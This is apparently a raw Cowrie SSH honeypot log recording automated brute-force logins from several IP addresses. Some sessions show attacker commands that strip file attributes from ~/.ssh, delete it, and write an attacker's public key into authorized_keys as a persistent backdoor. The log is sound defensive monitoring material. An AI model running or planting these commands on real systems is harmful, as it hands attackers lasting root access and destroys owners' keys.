{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.349397Z","src_ip":"185.56.83.202","session":"774af247a5d6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.462079Z","src_ip":"185.56.83.202","session":"774af247a5d6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.481704Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.482810Z","src_ip":"185.56.83.202","session":"774af247a5d6"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.64","src_port":46136,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc06a8d5fd33","protocol":"ssh","message":"New connection: 123.58.212.64:46136 (1.2.3.4:22) [session: cc06a8d5fd33]","sensor":"my-vps","timestamp":"2025-09-08T16:38:53.391742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:53.392517Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:53.648873Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX123!@#","message":"login attempt [root/1qaz@WSX123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:38:54.715214Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:38:55.279489Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:38:55.280205Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:38:55.281400Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:55.538867Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:38:56.068358Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.069067Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.327543Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.328385Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.64","src_port":43982,"dst_ip":"1.2.3.4","dst_port":22,"session":"728ba27d7f25","protocol":"ssh","message":"New connection: 123.58.212.64:43982 (1.2.3.4:22) [session: 728ba27d7f25]","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.476606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.477403Z","src_ip":"123.58.212.64","session":"728ba27d7f25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:56.683066Z","src_ip":"123.58.212.64","session":"728ba27d7f25"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T16:38:57.548744Z","src_ip":"123.58.212.64","session":"728ba27d7f25"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:58.756326Z","src_ip":"123.58.212.64","session":"728ba27d7f25"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.64","src_port":43988,"dst_ip":"1.2.3.4","dst_port":22,"session":"0430571566cb","protocol":"ssh","message":"New connection: 123.58.212.64:43988 (1.2.3.4:22) [session: 0430571566cb]","sensor":"my-vps","timestamp":"2025-09-08T16:38:58.951329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:58.951959Z","src_ip":"123.58.212.64","session":"0430571566cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:59.150399Z","src_ip":"123.58.212.64","session":"0430571566cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:38:59.983878Z","src_ip":"123.58.212.64","session":"0430571566cb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:39:00.183524Z","src_ip":"123.58.212.64","session":"0430571566cb"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:39:00.241561Z","src_ip":"123.58.212.64","session":"cc06a8d5fd33"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.60.101","src_port":52542,"dst_ip":"1.2.3.4","dst_port":22,"session":"69e04a401662","protocol":"ssh","message":"New connection: 190.108.60.101:52542 (1.2.3.4:22) [session: 69e04a401662]","sensor":"my-vps","timestamp":"2025-09-08T16:41:34.414623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:41:34.415557Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:41:34.702572Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123!","message":"login attempt [root/asd123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:41:35.888688Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:41:36.515101Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:41:36.515780Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:41:36.516890Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:41:36.802642Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:41:37.395434Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T16:41:37.396134Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T16:41:37.684358Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:41:37.685192Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.60.101","src_port":53416,"dst_ip":"1.2.3.4","dst_port":22,"session":"d171ed027f76","protocol":"ssh","message":"New connection: 190.108.60.101:53416 (1.2.3.4:22) [session: d171ed027f76]","sensor":"my-vps","timestamp":"2025-09-08T16:41:37.954171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:41:37.954861Z","src_ip":"190.108.60.101","session":"d171ed027f76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:41:38.230037Z","src_ip":"190.108.60.101","session":"d171ed027f76"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T16:41:39.364453Z","src_ip":"190.108.60.101","session":"d171ed027f76"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:41:40.638656Z","src_ip":"190.108.60.101","session":"d171ed027f76"}
{"eventid":"cowrie.session.connect","src_ip":"190.108.60.101","src_port":54068,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2dc0f4a0dc4","protocol":"ssh","message":"New connection: 190.108.60.101:54068 (1.2.3.4:22) [session: f2dc0f4a0dc4]","sensor":"my-vps","timestamp":"2025-09-08T16:41:40.913157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:41:40.914177Z","src_ip":"190.108.60.101","session":"f2dc0f4a0dc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:41:41.189962Z","src_ip":"190.108.60.101","session":"f2dc0f4a0dc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:41:42.329601Z","src_ip":"190.108.60.101","session":"f2dc0f4a0dc4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:41:42.603585Z","src_ip":"190.108.60.101","session":"f2dc0f4a0dc4"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:41:42.606340Z","src_ip":"190.108.60.101","session":"69e04a401662"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40608,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba8f6fad8100","protocol":"ssh","message":"New connection: 212.227.235.229:40608 (1.2.3.4:22) [session: ba8f6fad8100]","sensor":"my-vps","timestamp":"2025-09-08T16:42:36.729219Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:42:36.915610Z","src_ip":"212.227.235.229","session":"ba8f6fad8100"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58034,"dst_ip":"1.2.3.4","dst_port":22,"session":"df126bff12e5","protocol":"ssh","message":"New connection: 217.72.205.35:58034 (1.2.3.4:22) [session: df126bff12e5]","sensor":"my-vps","timestamp":"2025-09-08T16:42:37.499400Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:42:37.500833Z","src_ip":"217.72.205.35","session":"df126bff12e5"}
